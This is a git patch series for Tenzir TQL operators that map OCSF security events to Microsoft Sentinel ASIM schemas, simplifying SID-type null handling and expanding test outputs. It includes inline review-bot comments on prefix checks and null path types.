-assert (actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?) != null and process?.pid? != null and (process?.name? else process?.file?.name? else process?.path?) != null and process?.cmd_line? != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.process_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
index 62d4db5..81f180c 100644
--- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
+++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Scheduled Job Activity events to Microsoft Sentinel ASIM
 ---
 assert class_uid == 1006
-assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null,
- message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"}
 microsoft::asim::ocsf::helpers::common
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
index 1fc5782..7d4303a 100644
--- a/microsoft/operators/asim/ocsf/windows_service_activity.tql
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql
@@ -3,8 +3,6 @@ description: Maps OCSF Windows Service Activity events to Microsoft Sentinel ASI --- assert class_uid == 201004 -assert (job?.name? else log_name? else metadata?.log_name? else entity?.name? else entity?.uid? else win_service?.name? else win_service?.service_file?.path?) != null, - message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name?, type_uid: type_uid?, type_name: type_name?, name: "asim.audit_event"} microsoft::asim::ocsf::helpers::common From ce8063204098af8603bc96e64c7d1b3bc8e29116 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 17:33:56 +0200 Subject: [PATCH 13/27] Remove redundant null fallbacks Simplify ASIM OCSF mapper conditionals by dropping redundant else-null branches and using explicit boolean comparisons for optional SID predicates. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/ocsf/account_change.tql | 6 +++--- microsoft/operators/asim/ocsf/authentication.tql | 4 ++-- microsoft/operators/asim/ocsf/authorize_session.tql | 4 ++-- microsoft/operators/asim/ocsf/compliance_finding.tql | 4 ++-- microsoft/operators/asim/ocsf/detection_finding.tql | 4 ++-- microsoft/operators/asim/ocsf/entity_management.tql | 2 +- microsoft/operators/asim/ocsf/event_log_activity.tql | 2 +- microsoft/operators/asim/ocsf/group_management.tql | 6 +++--- microsoft/operators/asim/ocsf/process_activity.tql | 2 +- microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 +- microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 +- 11 files changed, 19 insertions(+), 19 deletions(-) diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql index 2f438a8..0ac7957 100644 --- a/microsoft/operators/asim/ocsf/account_change.tql +++ b/microsoft/operators/asim/ocsf/account_change.tql 
@@ -16,7 +16,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true match ocsf.activity_name { "Create" => { asim.EventType = "UserCreated" } @@ -37,10 +37,10 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetUsernameType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.GroupName = ocsf.group?.name? asim.GroupId = ocsf.group?.uid? -asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null +asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql index 4a0e603..599e62c 100644 --- a/microsoft/operators/asim/ocsf/authentication.tql +++ b/microsoft/operators/asim/ocsf/authentication.tql @@ -34,7 +34,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? if ocsf.user?.domain? != null and ocsf.user?.name? != null { 
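Review bot: The rewritten `asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true` (and the TargetUserIdType and GroupIdType lines in the second hunk) keeps a prefix test that is looser than the SID format it classifies: a Windows security identifier always begins with `S-1-`, while `"S-"` also matches unrelated identifiers such as a vendor uid that happens to start with those two characters, which then reaches Sentinel typed as a SID. Tightening the predicate to `asim.ActorUserId?.starts_with("S-1-") == true` keeps the commit's null-to-absent behaviour and narrows the false positives; the same applies to the equivalent lines in authentication, authorize_session, compliance_finding, detection_finding, entity_management, event_log_activity, group_management, process_activity and scheduled_job_activity further down this patch. If the upstream source is known to emit only well-formed SIDs, a comment such as `# SID uids are expected to start with S-1-` on the first of these lines would record that assumption.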
@@ -44,7 +44,7 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetDomainType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql index d7eba65..7979689 100644 --- a/microsoft/operators/asim/ocsf/authorize_session.tql +++ b/microsoft/operators/asim/ocsf/authorize_session.tql @@ -31,7 +31,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt? asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? if ocsf.user?.domain? != null and ocsf.user?.name? != null { @@ -41,7 +41,7 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null { asim.TargetDomainType = "Windows" } asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null +asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt? asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.SrcHostname = ocsf.src_endpoint?.hostname? diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 3652d12..6e2ebd2 100644 
--- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -13,14 +13,14 @@ asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? else null +asim.EventReportUrl = ocsf.finding_info?.url? asim.EventSubType = "Compliance Violation" asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? asim.ThreatCategory = "Security Policy Violation" asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null +asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 064f73b..fd6a6f2 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql 
@@ -28,14 +28,14 @@ asim.EventType = "Alert" asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? else null +asim.EventReportUrl = ocsf.finding_info?.url? asim.EventSubType = "Threat" asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? asim.ThreatCategory = $threat_categories[ocsf.finding_info?.types?[0]?.to_lower()]? asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null +asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true match ocsf.status? { "New" | "Active" | "In Progress" => { asim.AlertStatus = "Active" diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index eb0025a..4596c6a 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { asim.ActorUsernameType = "Windows" } asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null +asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true asim.SrcIpAddr = ocsf.src_endpoint?.ip? asim.TargetHostname = ocsf.dst_endpoint?.hostname? asim.TargetIpAddr = ocsf.dst_endpoint?.ip? diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 1f60436..a18038f 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql 
@@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
 asim.ActorUsernameType = "Windows"
 }
 asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
 asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql
index d5ec64b..78da3a0 100644
--- a/microsoft/operators/asim/ocsf/group_management.tql
+++ b/microsoft/operators/asim/ocsf/group_management.tql
@@ -16,7 +16,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
 asim.ActorUsernameType = "Windows"
 }
 asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
 match ocsf.activity_name {
 "Create" => { asim.EventType = "GroupCreated" }
@@ -33,10 +33,10 @@ if ocsf.user?.domain? != null and ocsf.user?.name? != null {
 asim.TargetUsernameType = "Windows"
 }
 asim.TargetUserId = ocsf.user?.uid?
-asim.TargetUserIdType = "SID" if (asim.TargetUserId?.starts_with("S-") else false) else null
+asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true
 asim.GroupName = ocsf.group?.name?
 asim.GroupId = ocsf.group?.uid?
-asim.GroupIdType = "SID" if (asim.GroupId?.starts_with("S-") else false) else null
+asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true
 asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.SrcHostname = ocsf.src_endpoint?.hostname?
diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql
index 3395d3f..ee0c83a 100644
--- a/microsoft/operators/asim/ocsf/process_activity.tql
+++ b/microsoft/operators/asim/ocsf/process_activity.tql
@@ -20,7 +20,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
 asim.ActorUsernameType = "Windows"
 }
 asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
 asim.ActingProcessId = ocsf.actor?.process?.pid?.string() else ocsf.process?.parent_process?.pid?.string() else ocsf.process?.pid?.string()
 asim.ParentProcessId = ocsf.actor?.process?.parent_process?.pid?.string()
 asim.TargetProcessId = ocsf.process?.pid?.string()
diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
index 81f180c..306a042 100644
--- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
+++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
@@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
 asim.ActorUsernameType = "Windows"
 }
 asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
 asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
index 7d4303a..2d52a32 100644
--- a/microsoft/operators/asim/ocsf/windows_service_activity.tql
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql
@@ -33,7 +33,7 @@ if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
 asim.ActorUsernameType = "Windows"
 }
 asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
+asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
 asim.SrcIpAddr = ocsf.src_endpoint?.ip?
 asim.TargetHostname = ocsf.dst_endpoint?.hostname?
 asim.TargetIpAddr = ocsf.dst_endpoint?.ip?
From 1c928c6f0c2969a2c4fc95b0440a2aeb851cd8e7 Mon Sep 17 00:00:00 2001
From: Matthias Vallentin
Date: Mon, 8 Jun 2026 17:37:47 +0200
Subject: [PATCH 14/27] Simplify Microsoft mapper tests

Remove redundant fallback expressions now that optional spreads and nullable predicates are handled directly. Drop final select projections from the ASIM package tests so they validate the full mapped event shape.

Assisted-by: GPT-5 Codex (Superconductor)
---
 .../asim/ocsf/file_system_activity.tql | 4 +-
 microsoft/tests/asim/graph.tql | 4 -
 microsoft/tests/asim/graph.txt | 128 +++++-
 microsoft/tests/asim/ocsf.tql | 5 -
 microsoft/tests/asim/ocsf.txt | 56 ++-
 microsoft/tests/asim/windows.tql | 6 +-
 microsoft/tests/asim/windows.txt | 131 +++++-
 microsoft/tests/ocsf-to-asim/alert.tql | 5 -
 microsoft/tests/ocsf-to-asim/alert.txt | 80 +++-
 microsoft/tests/ocsf-to-asim/audit.tql | 4 -
 microsoft/tests/ocsf-to-asim/audit.txt | 67 ++-
 .../tests/ocsf-to-asim/authentication.tql | 8 -
 .../tests/ocsf-to-asim/authentication.txt | 266 +++++++++-
 .../tests/ocsf-to-asim/direct-targets.tql | 11 -
 .../tests/ocsf-to-asim/direct-targets.txt | 413 ++++++++++++------
 microsoft/tests/ocsf-to-asim/process.tql | 5 -
 microsoft/tests/ocsf-to-asim/process.txt | 78 +++-
 .../tests/ocsf-to-asim/user-management.tql | 5 -
 .../tests/ocsf-to-asim/user-management.txt | 133 +++++-
 19 files changed, 1137 insertions(+), 272 deletions(-)
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql
index 9403a76..8ce30a7 100644
--- a/microsoft/operators/asim/ocsf/file_system_activity.tql
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql
@@ -28,10 +28,10 @@ asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1]
 if ocsf.activity_name == "Rename" and ocsf.file_result? != null {
 asim.SrcFilePath = asim.TargetFilePath
 asim.SrcFileName = asim.TargetFileName
- asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local"
+ asim.SrcFilePathType = "Windows Local" if asim.SrcFilePath?.contains("\\") == true else "Unix Local"
 asim.TargetFilePath = ocsf.file_result.path? else asim.TargetFilePath
 asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName
 }
-asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local"
+asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local"
 this = {...asim, AdditionalFields: ocsf}
diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql
index 70141d8..68698dc 100644
--- a/microsoft/tests/asim/graph.tql
+++ b/microsoft/tests/asim/graph.tql
@@ -5,7 +5,3 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" {
 microsoft::asim::map
 name = @name
 sort EventOriginalUid
-select name, EventSchema, EventSchemaVersion, EventType,
- EventResult, EventProduct, EventVendor, EventOriginalType,
- EventOriginalUid, Dvc, SrcIpAddr=SrcIpAddr?,
- TargetUsername, TargetUserId, TargetAppName=TargetAppName?
diff --git a/microsoft/tests/asim/graph.txt b/microsoft/tests/asim/graph.txt
index 5d5d9b8..1ac2942 100644
--- a/microsoft/tests/asim/graph.txt
+++ b/microsoft/tests/asim/graph.txt
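Review bot: `asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local"` still labels a missing path as `"Unix Local"`: when `TargetFilePath` is null the predicate is not true, the `else` branch fires, and consumers see a path type with no path behind it. The same applies to `SrcFilePathType` inside the Rename branch, since `SrcFilePath` is copied from `TargetFilePath` just above it. If an `if` without `else` yields null, as the `UserIdType` rewrites in the preceding patch rely on, a guard keeps the type nullable: `asim.TargetFilePathType = ("Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local") if asim.TargetFilePath? != null`. A test input without `file.path` would pin the expected null for both fields.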
@@ -1,16 +1,130 @@ { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventResult: "Success", + EventCount: 1, + EventStartTime: 2026-05-01T10:00:00Z, + EventEndTime: 2026-05-01T10:00:00Z, EventProduct: "Microsoft Entra ID", EventVendor: "Microsoft", - EventOriginalType: "300201", EventOriginalUid: "sign-in-1", + EventUid: "sign-in-1", + EventOriginalType: "300201", + EventSeverity: "Informational", + EventResult: "Success", + EventOriginalResultDetails: "0", Dvc: "Microsoft Entra ID", - SrcIpAddr: 203.0.113.10, + DvcAction: "Allowed", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventOriginalSubType: "interactiveUser", + ActorUsername: "example.com\\alice", + ActorUsernameType: "Windows", + ActorUserId: "user-1", + ActorUserIdType: null, + ActorSessionId: null, TargetUsername: "example.com\\alice", + TargetUsernameType: "Windows", + TargetDomain: "example.com", + TargetDomainType: "Windows", TargetUserId: "user-1", + TargetUserIdType: null, + TargetSessionId: null, + SrcIpAddr: 203.0.113.10, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: null, + TargetAppId: "app-1", TargetAppName: "Office 365", + LogonProtocol: null, + LogonMethod: "Push Notification", + AdditionalFields: { + action: "Allowed", + action_id: 1, + activity_id: 1, + activity_name: "Logon", + actor: { + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + type: "User", + type_id: 1, + uid: "user-1", + }, + }, + auth_factors: [ + { + factor_type: "Push Notification", + factor_type_id: 5, + }, + ], + category_name: "Identity & Access Management", + category_uid: 3, + class_name: "Authentication", + class_uid: 3002, + cloud: { + provider: "Azure", + }, + disposition: "Allowed", + disposition_id: 1, + dst_endpoint: { + svc_name: "Microsoft Graph", + uid: "resource-1", + }, + is_mfa: true, + is_remote: true, + 
logon_type: "interactiveUser", + logon_type_id: 99, + metadata: { + log_name: "auditLogs/signIns", + original_event_uid: "sign-in-1", + product: { + feature: { + name: "Microsoft Graph", + }, + name: "Microsoft Entra ID", + vendor_name: "Microsoft", + }, + profiles: [ + "cloud", + "security_control", + ], + version: "1.8.0", + }, + service: { + name: "Office 365", + uid: "app-1", + }, + severity: "Informational", + severity_id: 1, + src_endpoint: { + ip: 203.0.113.10, + location: { + city: "Berlin", + country: "DE", + }, + os: { + name: "Windows 11", + }, + uid: "device-1", + }, + status: "Success", + status_code: "0", + status_detail: "Other.", + status_id: 1, + time: 2026-05-01T10:00:00Z, + type_name: "Authentication: Logon", + type_uid: 300201, + unmapped: null, + user: { + domain: "example.com", + email_addr: "alice@example.com", + full_name: "Alice Example", + name: "alice", + type: "User", + type_id: 1, + uid: "user-1", + }, + }, + name: "asim.authentication", } diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index c8eb719..11e19d8 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -32,8 +32,3 @@ from { } microsoft::asim::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, - EventSubType, EventResult, EventProduct, EventVendor, - EventOriginalType, EventOriginalUid, Dvc, DnsQuery, - DnsQueryTypeName, DnsQueryClassName, EventResultDetails, - SrcIpAddr diff --git a/microsoft/tests/asim/ocsf.txt b/microsoft/tests/asim/ocsf.txt index 7b520b7..5670818 100644 --- a/microsoft/tests/asim/ocsf.txt +++ b/microsoft/tests/asim/ocsf.txt 
@@ -1,18 +1,60 @@ { - name: "asim.dns", - EventSchema: "Dns", - EventSchemaVersion: "0.1.7", - EventType: "Query", - EventSubType: "request", - EventResult: "Success", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:02Z, + EventEndTime: 2026-01-01T00:00:02Z, EventProduct: "DNS", EventVendor: "Microsoft", - EventOriginalType: "400301", EventOriginalUid: "dns-1", + EventUid: "dns-1", + EventOriginalType: "400301", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "dns1", + DvcHostname: "dns1", + DvcFQDN: "dns1", + EventSchema: "Dns", + EventSchemaVersion: "0.1.7", + EventType: "Query", + EventSubType: "request", DnsQuery: "example.org", DnsQueryTypeName: "A", DnsQueryClassName: "IN", EventResultDetails: "NA", SrcIpAddr: 10.0.0.1, + SrcHostname: null, + DstIpAddr: null, + DstHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + type_name: "DNS Activity: Query", + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, + }, + name: "asim.dns", } diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index eaa3966..9c85c19 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql 
@@ -4,8 +4,4 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" {
 this = data.parse_winlog()
 microsoft::asim::map
 name = @name
-select name, EventSchema, EventSchemaVersion, EventType,
- EventResult, EventProduct, EventVendor, EventOriginalType,
- EventOriginalUid, Dvc, DvcHostname, SrcIpAddr=SrcIpAddr?,
- TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType,
- LogonProtocol=LogonProtocol?
+drop AdditionalFields.metadata.processed_time?
diff --git a/microsoft/tests/asim/windows.txt b/microsoft/tests/asim/windows.txt
index d72b991..90b178f 100644
--- a/microsoft/tests/asim/windows.txt
+++ b/microsoft/tests/asim/windows.txt
@@ -1,19 +1,136 @@ { - name: "asim.authentication", - EventSchema: "Authentication", - EventSchemaVersion: "0.1.4", - EventType: "Logon", - EventResult: "Success", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, EventProduct: "Microsoft-Windows-Security-Auditing", EventVendor: "Microsoft", - EventOriginalType: "4624", EventOriginalUid: "98761", + EventUid: "98761", + EventOriginalType: "4624", + EventSeverity: "Informational", + EventResult: "Success", Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", - SrcIpAddr: 10.0.0.42, + DvcFQDN: "DC01.corp.local", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + EventSubType: "Remote", + EventOriginalSubType: "Network", + ActorUsername: "S-1-0-0", + ActorUserId: "S-1-0-0", + ActorUserIdType: "SID", + ActorSessionId: "0x0", TargetUsername: "CORP\\jdoe", TargetUsernameType: "Windows", + TargetDomain: "CORP", + TargetDomainType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", TargetUserIdType: "SID", + TargetSessionId: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", + SrcIpAddr: 10.0.0.42, + SrcHostname: null, + SrcPortNumber: 49827, + TargetHostname: "DC01.corp.local", + TargetAppId: null, + TargetAppName: null, LogonProtocol: "Kerberos", + AdditionalFields: { + activity_id: 1, + activity_name: "Logon", + actor: { + session: { + uid_alt: "0x0", + }, + user: { + domain: null, + name: null, + uid: "S-1-0-0", + }, + }, + auth_protocol: "Kerberos", + auth_protocol_id: 2, + category_name: "Identity & Access Management", + category_uid: 3, + class_name: "Authentication", + class_uid: 3002, + device: { + hostname: "DC01.corp.local", + }, + logon_type: "Network", + logon_type_id: 3, + metadata: { + event_code: "4624", + extensions: [ + { + name: "win", + }, + ], + log_format: "xml", + log_level: "0", + log_name: "Security", + log_version: "2", + logged_time: 2024-03-23T12:34:56.789012300Z, + 
original_event_uid: "98761", + product: { + name: "Microsoft-Windows-Security-Auditing", + uid: "{5770385F-C994-4D63-B9EC-B6FE73E0CE8A}", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + session: { + uid: "{B4C8A1F2-3D9E-4A12-8B7C-1F2E3D4A5B6C}", + uid_alt: "0xA1B2C3", + }, + severity: "Informational", + severity_id: 1, + src_endpoint: { + hostname: null, + ip: 10.0.0.42, + port: 49827, + }, + status: "Success", + status_id: 1, + time: 2024-03-23T12:34:56.789012300Z, + type_name: "Authentication: Logon", + type_uid: 300201, + unmapped: { + System: { + Task: 12544, + Keywords: "0x8020000000000000", + Correlation: { + ActivityID: "{abc123-def456}", + }, + Execution: { + ProcessID: 4, + ThreadID: 72, + }, + }, + EventData: { + LogonProcessName: "Kerberos", + TransmittedServices: null, + LmPackageName: null, + KeyLength: 0, + ProcessId: "0x0", + ProcessName: null, + ImpersonationLevel: "%%1833", + RestrictedAdminMode: null, + TargetOutboundUserName: null, + TargetOutboundDomainName: null, + VirtualAccount: "%%1843", + TargetLinkedLogonId: "0x0", + ElevatedToken: "%%1842", + }, + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + name: "asim.authentication", } diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/ocsf-to-asim/alert.tql index cb1927d..a63ba80 100644 --- a/microsoft/tests/ocsf-to-asim/alert.tql +++ b/microsoft/tests/ocsf-to-asim/alert.tql @@ -53,8 +53,3 @@ from { @name = "ocsf.detection_finding" microsoft::asim::ocsf::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, EventUid, - EventSeverity, EventOriginalUid, EventProduct, EventVendor, AlertName, - EventSubType, ThreatName, ThreatCategory, - ThreatOriginalCategory=ThreatOriginalCategory?, AlertStatus, - AlertOriginalStatus, AlertVerdict diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/ocsf-to-asim/alert.txt index 118437f..cdcba4e 100644 
--- a/microsoft/tests/ocsf-to-asim/alert.txt
+++ b/microsoft/tests/ocsf-to-asim/alert.txt
